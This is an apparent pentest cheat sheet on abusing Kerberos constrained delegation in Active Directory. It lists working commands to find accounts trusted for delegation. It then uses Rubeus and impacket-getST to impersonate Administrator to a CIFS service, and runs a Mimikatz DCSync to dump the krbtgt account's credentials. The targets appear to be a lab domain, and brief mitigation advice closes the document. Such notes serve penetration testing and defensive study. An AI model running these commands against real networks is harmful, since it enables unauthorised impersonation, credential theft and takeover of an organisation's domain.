Kerberos Constrained Delegation

User Account

Prerequisites

Hunting for user accounts that have kerberos-constrained delegation enabled:

Get-NetUser -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

In the below screenshot, the user spot is allowed to delegate or in other words, impersonate any user and authenticate to a file system service (CIFS) on a domain controller DC01.

User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to authenticate to the remote service.

TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.
https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

rubeus.exe asktgt /user:userName /domain:DomainName /ntlm:Hash /outfile:FileName.tgt

.\Rubeus.exe s4u /ticket:TGT_Ticket /msdsspn:"service/HOST" /impersonateuser:Administrator /ptt

invoke-Mimikatz -command '"lsadump::dcsync /user:abdo\krbtgt "'

impacket-getST   -k -impersonate administrator -spn cifs/HayStack.thm.corp -dc-ip 10.10.43.21 thm.corp/DARLA_WINTERS

Mitigation

To mitigate against the abuse of delegated accounts, we can ensure that the privileged accounts are configured to “Account is sensitive and cannot be delegated” within the Active Directory or added to the Protected User group to prevent delegation.
If delegation is needed for specific accounts, they should be secured with firewall rules that only serve the purpose and delegation to the required service and limit any other privileged access that might not be necessary.
Also, ensure the delegated accounts use strong passwords to protect them against attacks like Kerberoasting.